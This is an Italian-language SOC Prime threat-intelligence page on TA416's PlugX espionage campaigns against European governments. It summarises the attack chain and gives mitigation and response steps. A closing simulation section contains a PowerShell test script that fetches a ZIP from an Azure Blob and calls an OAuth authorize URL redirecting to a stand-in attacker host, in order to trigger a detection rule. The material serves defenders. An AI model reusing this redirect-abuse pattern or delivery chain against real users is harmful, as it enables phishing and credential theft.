SOC Prime Bias: Critico

08 Apr 2026 14:40
newspaper icon Proofpoint

Tornerei di corsa nell’UE: TA416 riprende le campagne di spionaggio sui governi europei

Author Photo
Ruslan Mikhalov Capo della Ricerca sulle Minacce presso SOC Prime linkedin icon Segui
Tornerei di corsa nell’UE: TA416 riprende le campagne di spionaggio sui governi europei
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Sommario

TA416, un attore di minaccia allineato alla Cina, ha ripreso a prendere di mira enti governativi e diplomatici europei a metà del 2025 dopo un periodo di attività ridotta. L’attore combina la ricognizione con bug web leggeri con la consegna di una backdoor PlugX personalizzata, ruotando le catene di accesso iniziale che includono esche false in stile Cloudflare Turnstile, abuso del reindirizzamento OAuth e downloader gestiti da MSBuild. Entro marzo 2026, i rapporti indicano che lo stesso playbook si è ampliato ai bersagli diplomatici del Medio Oriente in un contesto di crescenti tensioni regionali legate all’Iran. Le campagne si basano su cassette postali compromesse, binari Windows firmati per il caricamento laterale di DLL e un’infrastruttura di comando e controllo a rotazione rapida.

Indagine

Proofpoint ha seguito più ondate di spear-phishing inviate da indirizzi di posta elettronica gratuiti e account governativi compromessi, utilizzando pixel di tracciamento o archivi armati. Le catene basate su archivi usavano il contrabbando ZIP con artefatti LNK per mettere in scena pacchetti MSI o TAR, che poi avviavano eseguibili firmati per caricare lateralmente PlugX. In parallelo, TA416 ha abusato del reindirizzamento OAuth ID di Microsoft Entra e ha utilizzato binari MSBuild rinominati abbinati a file di progetto C# dannosi per recuperare ed eseguire i payload. È stato osservato traffico C2 su HTTP con messaggi crittografati RC4 e modelli specifici di intestazione/cookie utilizzati per modellare le richieste e le risposte.

Mitigazione

Rafforzare l’autenticazione email e restringere i controlli sui contenuti in entrata provenienti da fornitori di servizi cloud sconosciuti. Monitorare l’esecuzione sospetta di binari firmati comunemente abusati per il caricamento laterale (ad esempio, cnmpaui.exe e steam_monitor.exe) e segnalare comportamenti anormali dell’ordine di ricerca DLL. Aggiungere rilevamenti per firme insolite di intestazioni HTTP o cookie associate a C2 crittografato e bloccare i domini/IP TA416 noti ove possibile. Migliorare il monitoraggio degli endpoint per la persistenza delle chiavi Run create di recente e scritture di file inattese in directory pubbliche o condivise.

Risposta

Se viene rilevata attività, isolare l’host, acquisire memoria volatile e conservare i registri rilevanti degli endpoint e delle mail per la delimitazione. Cacciare gli artefatti PlugX inclusi il caricatore CNCLID.dll, il shellcode Canon.dat e il mutex dGcEuQhKT. Revocare l’accesso agli account email compromessi, reimpostare le credenziali e rimuovere eventuali attività pianificate o altri meccanismi di persistenza. Analizzare la telemetria di rete per il beaconing HTTP crittografato RC4, quindi bloccare i domini/URL associati ed espandere la caccia in tutto l’ambiente.

"graph TB %% Class Definitions Section classDef action fill:#ffcccc classDef tool fill:#ccccff classDef malware fill:#ffcc99 classDef process fill:#ccffcc %% Nodes action_initial_access["<b>Azione</b> – T1566 Phishing: Email di phishing inviate da account compromessi e phishing generico. I destinatari cliccano su link malevoli."] class action_initial_access action tool_phishing_email["<b>Strumento</b> – <b>Nome</b>: Email di Phishing<br/><b>Tecnica</b>: T1566"] class tool_phishing_email tool action_user_execution["<b>Azione</b> – T1204 Esecuzione Utente: Le vittime cliccano su URL malevoli che portano al download di ZIP malevoli."] class action_user_execution action tool_malicious_zip["<b>Strumento</b> – <b>Nome</b>: Archivio ZIP malevolo contenente scorciatoia LNK"] class tool_malicious_zip tool action_lnk_smuggling["<b>Azione</b> – T1027.012 LNK Icon Smuggling: Scorciatoia LNK esegue script PowerShell."] class action_lnk_smuggling action process_powershell["<b>Processo</b> – Esecuzione di PowerShell per estrarre binario firmato"] class process_powershell process tool_signed_binary["<b>Strumento</b> – <b>Nome</b>: cnmpaui.exe (binario legittimo firmato)"] class tool_signed_binary tool action_dll_sideloading["<b>Azione</b> – T1218 Esecuzione del Proxy Binario di Sistema: Il caricamento laterale di DLL carica DLL malevola."] class action_dll_sideloading action malware_malicious_dll["<b>Malware</b> – DLL malevola caricata tramite caricamento laterale"] class malware_malicious_dll malware action_msbuild_execution["<b>Azione</b> – T1127.001 Esecuzione del Proxy degli Strumenti di Sviluppatori Fidati: MSBuild usato per scaricare ed eseguire PlugX."] class action_msbuild_execution action tool_msbuild["<b>Strumento</b> – <b>Nome</b>: Eseguibile MSBuild rinominato"] class tool_msbuild tool tool_csharp_project["<b>Strumento</b> – <b>Nome</b>: File di progetto C# malevolo"] class tool_csharp_project tool malware_plugx["<b>Malware</b> – Payload di PlugX"] class malware_plugx malware action_persistence["<b>Azione</b> – T1037.001 Persistenza tramite chiave Run del registro e modifica delle scorciatoie."] class action_persistence action process_registry["<b>Processo</b> – Creazione della chiave Run del registro sotto HKCUSoftwareMicrosoftWindowsCurrentVersionRun"] class process_registry process action_defense_evasion["<b>Azione</b> – T1553.002 Sovversione dei Controlli di Fiducia: Abuso di eseguibili firmati e offuscamento pesante."] class action_defense_evasion action action_apddomain_hijack["<b>Azione</b> – T1574.014 Hijack Execution Flow: Dirottamento di AppDomainManager tramite catena MSBuild"] class action_apddomain_hijack action action_c2["<b>Azione</b> – T1071.001 Protocolli Web e T1573.001 Canale Crittografato: HTTP C2 con crittografia RC4"] class action_c2 action process_c2_communication["<b>Processo</b> – Comunicazione HTTP crittografata con server C2"] class process_c2_communication process action_exfiltration["<b>Azione</b> – T1041 Esfiltrazione tramite Canale C2: Dati inviati su canale crittografato"] class action_exfiltration action %% Connections action_initial_access –>|consegna| tool_phishing_email tool_phishing_email –>|contiene link che porta a| action_user_execution action_user_execution –>|scarica| tool_malicious_zip tool_malicious_zip –>|contiene| action_lnk_smuggling action_lnk_smuggling –>|esegue| process_powershell process_powershell –>|estrae| tool_signed_binary tool_signed_binary –>|carica| action_dll_sideloading action_dll_sideloading –>|carica| malware_malicious_dll malware_malicious_dll –>|prepara l’ambiente per| action_msbuild_execution action_msbuild_execution –>|usa| tool_msbuild tool_msbuild –>|elabora| tool_csharp_project tool_csharp_project –>|scarica ed esegue| malware_plugx malware_plugx –>|crea| action_persistence action_persistence –>|scrive| process_registry action_persistence –>|modifica scorciatoia per| action_lnk_smuggling action_persistence –>|permette| action_defense_evasion action_defense_evasion –>|applica| action_apddomain_hijack action_apddomain_hijack –>|permette| action_c2 action_c2 –>|comunica tramite| process_c2_communication process_c2_communication –>|esfiltra dati tramite| action_exfiltration "

Flusso di attacco

Esecuzione di Simulazione

Prerequisito: Il Controllo di Volo della Telemetria e della Linea di Base deve essere passato.

Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto riflettono direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.

  • Narrazione dell’Attacco e Comandi:

    1. Preparare il payload: L’attaccante carica un file ZIP malevolo (payload.zip) nel contenitore Azure Blob mydownload.z29.web.core.windows.net.
    2. Creare una pagina di esca: Una pagina HTML malevola ospitata sullo stesso dominio include un <img> tag che punta all’URL del Blob di Azure (attivando il download) and un <iframe> nascosto che reindirizza immediatamente la vittima a un endpoint di autorizzazione OAuth 2.0 ID di Microsoft Entra con un redirect_uri che punta al dominio controllato dall’attaccante.
    3. Interazione della vittima: La vittima visita la pagina di esca (ad es. tramite un’email di phishing). Il browser emette due richieste HTTP GET in rapida successione: una per l’URL del Blob e una per l’URL OAuth. I Log Attività Azure registrano entrambe le richieste sotto la stessa sessione proxy, soddisfacendo la condizione della regola selection_blob E selection_oauth .

  • Script di Test di Regressione: (eseguito dalla macchina della vittima per riprodurre la telemetria)

    # Simulazione di attivazione di TA416 Azure Blob + OAuth
# Passo 1: Scaricare blob malevolo (simulato con un file benigno)
Invoke-WebRequest -Uri "https://mydownload.z29.web.core.windows.net/payload.zip" -OutFile "$env:TEMPpayload.zip"

# Passo 2: Invocare immediatamente l'URL di autorizzazione OAuth (reindirizzamento simulato)
$oauthUrl = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=FAKE_CLIENT_ID&response_type=code&redirect_uri=https://attacker.example.com/callback"
Invoke-WebRequest -Uri $oauthUrl -Method GET -UseBasicParsing | Out-Null

Write-Host "Simulazione completata – entrambi gli URL richiesti."

  • Comandi di Pulizia:

    # Rimuovere il file scaricato
Remove-Item -Path "$env:TEMPpayload.zip" -Force -ErrorAction SilentlyContinue

# Cancellare le variabili di sessione di PowerShell
Remove-Variable -Name oauthUrl -ErrorAction SilentlyContinue

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilità sulle minacce più rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis